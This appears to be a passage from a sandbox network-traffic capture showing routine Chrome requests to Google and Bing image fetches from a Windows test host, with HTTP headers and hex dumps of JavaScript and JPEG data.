                                                                                                                                                                                                                                                                                                2024-12-20 06:31:20 UTC1390INData Raw: 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 49 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 7d 7d 3b 5f 2e 4a 64 5c 75 30 30 33 64 6e 65 77 20 5f 2e 49 64 28 5c 22 61 62 6f 75 74 3a 69 6e 76 61 6c 69 64 23 7a 43 6c 6f 73 75 72 65 7a 5c 22 29 3b 5f 2e 46 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 6e 68 5c 75 30 30 33 64 61 7d 7d 3b 5f 2e 4b 64 5c 75 30 30 33 64 5b 47 64 28 5c 22 64 61 74 61 5c 22 29 2c 47 64 28 5c 22 68 74 74 70 5c 22 29 2c 47 64 28 5c 22 68 74 74 70 73 5c 22 29 2c 47 64 28 5c 22 6d 61 69 6c 74 6f 5c 22 29
                                                                                                                                                                                                                                                                                                Data Ascii: obalThis.trustedTypes;_.Id\u003dclass{constructor(a){this.i\u003da}toString(){return this.i}};_.Jd\u003dnew _.Id(\"about:invalid#zClosurez\");_.Fd\u003dclass{constructor(a){this.nh\u003da}};_.Kd\u003d[Gd(\"data\"),Gd(\"http\"),Gd(\"https\"),Gd(\"mailto\")
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:20 UTC1390INData Raw: 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 29 7b 6c 65 74 20 63 2c 64 3b 62 5c 75 30 30 33 64 28 64 5c 75 30 30 33 64 28 63 5c 75 30 30 33 64 5c 22 64 6f 63 75 6d 65 6e 74 5c 22 69 6e 20 62 3f 62 2e 64 6f 63 75 6d 65 6e 74 3a 62 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 29 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 64 2e 63 61 6c 6c 28 63 2c 60 24 7b 61 7d 5b 6e 6f 6e 63 65 5d 60 29 3b 72 65 74 75 72 6e 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 5c 22 5c 22 3a 62 2e 6e 6f 6e 63 65 7c 7c 62 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 5c 22 6e 6f 6e 63 65 5c 22 29 7c 7c 5c 22 5c 22 7d 3b 5c 6e 5f 2e 24 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b
                                                                                                                                                                                                                                                                                                Data Ascii: d\u003dfunction(a,b\u003ddocument){let c,d;b\u003d(d\u003d(c\u003d\"document\"in b?b.document:b).querySelector)\u003d\u003dnull?void 0:d.call(c,`${a}[nonce]`);return b\u003d\u003dnull?\"\":b.nonce||b.getAttribute(\"nonce\")||\"\"};\n_.$d\u003dfunction(a){
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:20 UTC1390INData Raw: 30 33 64 5c 75 30 30 33 64 5c 22 73 74 79 6c 65 5c 22 3f 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 63 6c 61 73 73 5c 22 3f 61 2e 63 6c 61 73 73 4e 61 6d 65 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 66 6f 72 5c 22 3f 61 2e 68 74 6d 6c 46 6f 72 5c 75 30 30 33 64 63 3a 6a 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 64 29 3f 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 6a 65 5b 64 5d 2c 63 29 3a 5f 2e 65 65 28 64 2c 5c 22 61 72 69 61 2d 5c 22 29 7c 7c 5f 2e 65 65 28 64 2c 5c 22 64 61 74 61 2d 5c 22 29 3f 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 64 2c 63 29 3a 61 5b 64 5d 5c 75 30 30 33 64 63 7d 29 7d 3b 6a 65 5c 75 30 30 33 64 7b 63 65 6c 6c 70 61 64
                                                                                                                                                                                                                                                                                                Data Ascii: 03d\u003d\"style\"?a.style.cssText\u003dc:d\u003d\u003d\"class\"?a.className\u003dc:d\u003d\u003d\"for\"?a.htmlFor\u003dc:je.hasOwnProperty(d)?a.setAttribute(je[d],c):_.ee(d,\"aria-\")||_.ee(d,\"data-\")?a.setAttribute(d,c):a[d]\u003dc})};je\u003d{cellpad


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                24192.168.2.649768172.217.21.364436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:19 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: www.google.com
                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:20 UTC933INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Version: 705503573
                                                                                                                                                                                                                                                                                                Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                                Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                                Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                                Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:20 GMT
                                                                                                                                                                                                                                                                                                Server: gws
                                                                                                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                Accept-Ranges: none
                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:20 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                25192.168.2.649776150.171.27.10443
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:21 UTC375OUTGET /th?id=OADD2.10239340418602_13EDNGC3ZL2WGZFXN&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                                                                                                                Host: tse1.mm.bing.net
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:21 UTC854INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                                Content-Length: 407830
                                                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                                                                                                                                                                NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                X-MSEdge-Ref: Ref A: C3F748532B6E444AAACD9B5E18DF0AFA Ref B: EWR30EDGE0307 Ref C: 2024-12-20T06:31:21Z
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:20 GMT
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:21 UTC15530INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e1 00 da 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 00 00 00 00 60 00 00 00 01 00 00 00 60 00 00 00 01 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 34 2e 31 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 30 32 3a 31 31 20 30 30 3a 35 33 3a 30 35 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 03 00 00 00 01 07 80 00 00 a0 03 00 03 00 00 00 01 04 38 00 00 00 00 00 00 00 00 ff db 00 43 00 04 02 03 03 03 02 04 03 03 03
                                                                                                                                                                                                                                                                                                Data Ascii: JFIFHHExifMM*bj(1r2i``Adobe Photoshop 24.1 (Windows)2023:02:11 00:53:058C
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:21 UTC16384INData Raw: 14 29 3d 64 e7 04 91 81 d3 de af 5d 69 11 c0 d2 5b db db 47 73 26 9d b6 28 22 31 1f 3a 57 66 03 6a 84 ce e2 0f a9 3d 3f 0a e4 75 21 39 ab 46 f6 ed fd 7e 66 8a 9c de e7 41 a1 fc 4b d6 c7 86 df c2 9a 2f 86 b4 fb 1b 6b d8 98 ea d2 9b 73 24 d7 db b0 49 95 98 90 87 3c e1 71 c5 0b 2c af 24 71 de 49 12 49 e4 98 63 3c 10 80 0f 51 9c e0 64 e4 77 ac 37 be b8 b7 d6 de 28 4b 46 cd f3 1b 76 8c ef 56 23 90 57 b1 03 b7 61 52 24 b3 2c 26 d8 db 4a ed b4 9b 6d 8a 19 19 ce 08 dd 9e 55 46 09 ed ce 3d e8 af ed b1 1f 1e df d7 dc 77 61 e1 1a 49 ea 49 65 6d 6f a5 42 d1 69 d0 5d 4b 2d cb 12 6e 65 ff 00 57 cf 46 20 9e 00 e9 d3 93 f8 d1 73 7b 6b 69 7a df 65 c8 52 49 96 77 c0 0e c0 60 91 dc 7e 1d a9 46 a3 63 a9 ea b1 e9 bb fe c3 60 d2 05 1e 6b 11 24 92 93 cb 33 1c 05 03 9e bc 0e 2b
                                                                                                                                                                                                                                                                                                Data Ascii: )=d]i[Gs&("1:Wfj=?u!9F~fAK/ks$I<q,$qIIc<Qdw7(KFvV#WaR$,&JmUF=waIIemoBi]K-neWF s{kizeRIw`~Fc`k$3+
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:21 UTC16384INData Raw: 7b 8a f6 4f 84 be 05 4b 1f 05 44 9a d7 89 6f b4 c9 4d d3 dd 5f 59 d9 6a 81 e6 be 81 c6 f8 a1 94 02 58 1e 41 60 0f cc 38 e3 19 af 37 f1 d5 b7 8d 75 0b 91 e1 4f 11 ea 93 45 a0 4e f2 c5 a2 db c5 a6 2c 92 33 96 06 30 eb 0e c3 b4 6e 27 79 52 15 54 f0 79 35 d5 1a 7c 94 d3 4b 5f bf fe 01 9e ed ab dd 23 32 3d 67 e3 b7 89 6d ef 3f e1 0d f1 2e b0 da 7b db 3c b7 56 d3 ea 48 1b 49 8d a4 61 e4 ca 64 00 89 18 60 ae 36 86 1f 74 57 6d f0 23 e0 e7 88 34 7f 12 0f 14 78 d3 56 fb 46 a5 63 70 c2 dd dc 35 c1 ba 8c 81 96 6f 37 85 04 f7 00 30 c6 2b e7 5d 07 56 97 c0 de 3c 7b bd 3f 50 b0 d4 26 d2 6e 77 25 d5 b3 49 71 6b 74 e8 70 26 c6 00 68 c0 e9 91 9f a6 6b ec 9f 87 9f 11 b4 1d 73 c0 76 7a ce b3 e2 7d 25 6f 5a 11 2d f0 6c db 18 43 13 86 68 df 91 9c 70 17 39 f7 e6 9e 1e 70 a8 db
                                                                                                                                                                                                                                                                                                Data Ascii: {OKDoM_YjXA`87uOEN,30n'yRTy5|K_#2=gm?.{<VHIad`6tWm#4xVFcp5o70+]V<{?P&nw%Iqktp&hksvz}%oZ-lChp9p
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:21 UTC16384INData Raw: a5 a6 91 ed 45 c0 8c 8c 50 45 3f 02 93 6f b5 17 15 86 62 92 9f 8a 0d 31 0c c0 a4 c5 3c 8a 46 1d e8 01 85 69 a5 7d 6a 4a 4c 50 03 18 52 11 4f c6 39 a0 8e d4 01 1f 4e 94 60 53 f1 48 45 3b 88 8f 06 82 33 4f 22 93 02 98 86 11 48 47 ad 3f 8a 4d be d4 00 c2 29 2a 42 33 4d c7 6a 00 69 1e b4 da 93 02 93 14 0a c3 31 eb 4d c1 a7 e2 8c 50 22 3c 7a 50 45 3e 82 3b 53 b8 11 d3 70 6a 4d be d4 98 a7 70 19 46 05 3a 9b 40 ac 34 8c 51 8c 53 f1 48 46 68 10 c2 29 08 a7 e2 90 8c 50 03 08 a4 22 a4 23 34 d2 3d 68 01 a4 66 9a 46 2a 4c 0a 6e 0d 02 63 70 29 31 4f a4 c5 02 19 8e f4 63 34 ec 1a 08 cd 00 33 14 98 ef 4e c1 a0 8a 00 66 3e 5a 4c 77 a7 91 49 83 40 0c c5 26 05 49 81 4d c7 a5 3b 80 dc 7a 53 70 6a 4a 69 19 a2 e2 1b 8e d4 98 f4 a7 d3 70 69 80 d2 29 08 ef 4f 2b 43 0e d4 08 8c
                                                                                                                                                                                                                                                                                                Data Ascii: EPE?ob1<Fi}jJLPRO9N`SHE;3O"HG?M)*B3Mji1MP"<zPE>;SpjMpF:@4QSHFh)P"#4=hfF*Lncp)1Oc43Nf>ZLwI@&IM;zSpjJipi)O+C
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:21 UTC16384INData Raw: cb 1d 46 d2 e9 21 b5 69 6e 44 92 83 34 4a fb 40 31 93 c3 73 e9 cf 3e d5 ce 68 ba ad a4 ba 3d d3 ea 8f f6 7b 78 c2 15 8c 33 39 79 80 20 28 eb 8c 28 eb db 35 2d ce 97 0e a9 f6 bb a6 9a 1b 5b eb 99 84 b3 b4 b2 a4 71 02 c7 21 42 a0 01 41 3d 80 c0 fc 2b 3b c4 5e 14 93 48 41 2c d7 d0 bb 79 60 b9 75 21 7c c6 38 c2 7f 78 63 f8 b1 8a ea 8c 69 af 72 e7 2d 49 55 6d 4e c6 a6 9f e2 b8 2d e3 43 6f 6c 06 01 7b 99 56 43 b9 49 23 0b c7 de 2d d3 8f 5f ad 60 5c f8 9f 50 fb 51 92 52 a8 4b 07 58 91 41 db 8e 42 f3 9c 7d 7a 8a c8 85 ee 09 78 5d c4 48 84 33 8c 73 91 e8 07 7a 2d e3 49 ef 8a 84 38 62 48 2c 79 23 fa 57 44 68 c2 2d e8 73 ca b4 e4 92 b9 0d f5 c5 c5 e5 c4 f7 b7 32 34 93 4c e5 9d dc 96 66 24 f3 cd 4f a6 db ce bb 2e 22 23 72 92 db 41 19 18 f5 06 a1 bc 9b 73 f9 6a 40 8d
                                                                                                                                                                                                                                                                                                Data Ascii: F!inD4J@1s>h={x39y ((5-[q!BA=+;^HA,y`u!|8xcir-IUmN-Col{VCI#-_`\PQRKXAB}zx]H3sz-I8bH,y#WDh-s24Lf$O."#rAsj@
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:21 UTC16384INData Raw: f5 f3 f9 9b cb 17 3a c9 29 0f b6 8b 56 1a 0d ca 18 95 ae 95 95 2d 9e 0b 85 fd d0 c7 ce b2 27 24 82 31 d0 64 11 4f 5b 68 2c 63 b2 b6 3a 70 b9 6d 44 07 dc 9c 65 49 00 80 c7 9c 92 39 39 e4 1a a9 25 94 d6 31 ca 92 3a c6 f7 07 73 18 57 f7 8e 4f 55 07 d0 1f 5f 5a 9e 0b 49 b4 c9 12 ed 24 8e ea 3b 72 8c c8 09 66 46 04 12 b9 3d c7 4c 8e bf 85 6d 74 f6 7a 19 2e 65 2b d8 d9 f1 64 1a 25 8e b5 04 c6 c9 66 89 0f 97 61 a7 cb 09 31 4c a1 70 5d 88 20 b1 69 0e 00 1c e4 7e 15 07 85 ed 22 91 f4 d7 4d 0a 27 b8 37 af 6f 2b 18 4c a9 30 09 92 b9 ce 15 94 82 00 e3 03 d7 15 3e a8 fa be a3 7d 65 ab 4b e4 c9 71 1c 82 5b 61 20 0e a1 55 83 20 0a c4 15 e4 75 20 66 b3 ad 75 7d 42 d6 49 b5 83 fb cb 68 35 04 bd 9a d1 64 0a 8d 2b b3 03 c0 e7 24 e7 81 d0 13 4a 9a 6a 29 5e ef d4 de 72 4a a3
                                                                                                                                                                                                                                                                                                Data Ascii: :)V-'$1dO[h,c:pmDeI99%1:sWOU_ZI$;rfF=Lmtz.e+d%fa1Lp] i~"M'7o+L0>}eKq[a U u fu}BIh5d+$Jj)^rJ
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:21 UTC16384INData Raw: ff 00 8d 7d 05 f0 8b c1 f6 fa 7d 8e a3 e2 8d 7e c2 39 ec 60 b4 76 11 5c c2 c8 4c a5 95 43 95 39 2a 00 1c 03 cf 3f 4a d8 f8 89 a8 bc ba 39 83 44 bd 85 03 c0 92 cc a2 dc 0d e4 c9 80 02 8e 01 00 63 3d 06 0d 79 f3 cc 23 46 7c bc ba 75 2d e5 fc f1 e6 72 77 39 18 9f c2 9a 26 92 ba 75 91 37 ba 84 ab b9 a3 8a e0 f9 76 f3 3a a8 75 6e 30 57 38 04 8e 32 3a 90 29 3f e1 23 d4 05 d7 f6 7e 92 96 b7 56 73 5b 19 84 b7 8b b0 45 b0 07 3b 00 cb 15 5d a4 e5 b1 da b9 eb 4d 46 3b ad 79 96 6d d6 e8 a1 12 52 62 25 5b e6 39 de 01 c8 00 f3 8c 8c 7b 56 4e a1 e3 1b 2b 47 68 ad 74 a5 b9 9e 48 4c 13 10 e7 13 86 20 61 d4 1c 60 81 d3 24 e3 1f 4a e6 f6 32 96 89 5f fa f9 1a 4f 13 18 af 8a c6 5f 8b 35 14 d5 b4 db 98 61 9e d5 c2 dc 82 44 a4 a9 9c b1 27 72 f2 42 e3 a0 1d 71 cd 73 77 1a 55 d2
                                                                                                                                                                                                                                                                                                Data Ascii: }}~9`v\LC9*?J9Dc=y#F|u-rw9&u7v:un0W82:)?#~Vs[E;]MF;ymRb%[9{VN+GhtHL a`$J2_O_5aD'rBqswU
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:22 UTC16067INData Raw: 2d c8 ca cb 24 27 0a e7 1c e7 a1 07 d4 9e f5 a5 39 2e 66 ac 73 d4 a7 7d b7 3f 6e 68 a3 06 8c 1a 40 14 51 45 00 14 da 75 14 00 da 29 d4 50 3b 8d a2 9d 81 48 45 01 71 28 a3 06 86 eb 40 c2 8a 28 a0 02 8a 30 68 a0 02 8a 31 de 8a 00 28 a2 8a 00 30 29 31 4b 45 00 26 29 30 69 d4 50 03 68 a7 60 52 62 80 12 8a 28 a7 71 dc 28 a2 8a 2e 17 0a 28 c7 a5 2e 29 85 c4 a2 8c 1a 30 68 0b 86 05 18 14 60 d1 40 5c 30 29 31 4b 45 01 71 31 49 83 4e a2 9d c2 e3 68 a7 60 51 81 4e e3 1b 45 3b 02 90 8a 2e 02 51 4b 8a 4c 1a 00 30 29 31 4b 83 45 00 26 29 29 d4 50 3b 8d a3 06 9d 81 46 05 01 71 b4 11 9a 5c 51 8a 06 37 14 62 96 8a 00 6d 14 ea 30 29 dc 06 e0 52 62 97 06 8a 2e 03 70 68 a7 11 9a 31 e9 4c 77 1b 81 48 45 3b 14 98 34 0e e3 70 68 a7 11 43 74 a0 77 1a 45 26 29 d8 a4 a0 63 70 68
                                                                                                                                                                                                                                                                                                Data Ascii: -$'9.fs}?nh@QEu)P;HEq(@(0h1(0)1KE&)0iPh`Rb(q(.(.)0h`@\0)1KEq1INh`QNE;.QKL0)1KE&))P;Fq\Q7bm0)Rb.ph1LwHE;4phCtwE&)cph
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:22 UTC16384INData Raw: cf 4f af 1c 54 4b 05 f5 92 ad fa 06 68 1d 9d 56 45 e0 f4 19 ce 79 c1 0c 39 c7 34 e1 3e 1a 56 b8 58 98 4b 93 07 f0 ae ee ec 47 52 00 ed df 8f 7a ea 3c 29 65 61 7b e1 d9 f5 7b dd 5f 4b 8d 60 f9 4d a5 e4 ac 1a 78 8f ca 63 2a b8 60 c0 e1 d4 e7 07 f5 ae 87 2e 55 7b 19 42 9a 9b b2 7a 90 8f ed 6d 57 c3 cd 0d a5 96 99 a7 c7 63 30 92 e2 f2 30 52 e0 b7 96 14 31 6c 82 03 2b 0f 94 0c 1e be a6 a0 b8 d4 67 1a 24 5a 2d aa 2a 47 66 aa 2f 64 b4 cb 09 d0 b0 21 98 12 54 38 24 0d df 4f 5a 65 f5 d5 fe af ab 49 61 11 8d 56 ee 48 ed a0 9e 58 c6 f5 58 c6 c0 18 26 42 9c 1e 4f 40 7d 30 6b 7f c3 6e fe 1a f0 fd dc d6 69 2d fb 5d 09 34 bb d9 e2 82 39 21 b0 91 4e e1 b2 4c ed 97 20 6e 18 3c 0f 5e 95 84 a4 d2 34 7a ca c9 bb 75 7f d7 c8 82 1b 9f f8 44 bc 47 6a 92 dd fd 83 ee 4b e6 4a 0b
                                                                                                                                                                                                                                                                                                Data Ascii: OTKhVEy94>VXKGRz<)ea{{_K`Mxc*`.U{BzmWc00R1l+g$Z-*Gf/d!T8$OZeIaVHXX&BO@}0kni-]49!NL n<^4zuDGjKJ
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:22 UTC16384INData Raw: 06 08 fc 80 d9 ea de b5 a1 34 57 13 2a f9 1b 8a 5d 4a 15 c8 20 b6 ee b9 38 e0 01 d6 a2 bd 8a 2b 37 8a de 28 9a 60 9f 33 b0 04 12 0f 40 41 e9 8c e3 1c d6 cf 86 a4 b7 b6 91 64 88 f9 ca 08 51 12 9f 99 4e 49 00 8e a4 82 3e a7 26 b6 9c d2 8d d2 39 69 c6 ef 95 b2 a4 3a 6a 58 07 d3 e5 71 3b 4d 37 97 2c ef 1e 12 2e 72 14 93 d7 3d 38 ed 5a 1a 82 59 da 58 35 c2 cb 24 a1 a3 58 ed 81 88 6d 54 04 8e fd 0e 7d 85 58 d4 9d 2c b4 e6 bb bd 91 65 12 02 ea b8 2c 65 27 aa 80 39 e0 f5 24 f0 2b 2f 45 92 eb 56 98 c1 3a c9 9b b5 2f 1c b2 64 c7 19 e7 90 07 ca 06 38 00 f4 c1 ae 7e 69 54 5c cd e8 8d 1a 51 f7 56 ec c7 bf b8 1a 86 a1 14 29 6f 22 47 14 21 11 36 e0 24 4a 32 5b 1d 49 ef d7 9a e8 2d ee 92 18 63 69 71 72 c1 4c f6 a8 e7 6f ca 78 52 c3 b9 38 07 07 f5 cd 61 ea 2d 69 a7 b1 68
                                                                                                                                                                                                                                                                                                Data Ascii: 4W*]J 8+7(`3@AdQNI>&9i:jXq;M7,.r=8ZYX5$XmT}X,e,e'9$+/EV:/d8~iT\QV)o"G!6$J2[I-ciqrLoxR8a-ih


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                26192.168.2.649777150.171.27.10443
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:21 UTC346OUTGET /th?id=OADD2.10239340418601_1XRLHD1YRS9ZZSDWX&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                                                                                                                Host: tse1.mm.bing.net
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:22 UTC854INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                                Content-Length: 453802
                                                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                                                                                                                                                                NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                X-MSEdge-Ref: Ref A: 7D577CCA80FA480FBC36152E3E3D359A Ref B: EWR30EDGE0115 Ref C: 2024-12-20T06:31:21Z
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:21 GMT
                                                                                                                                                                                                                                                                                                Connection: close
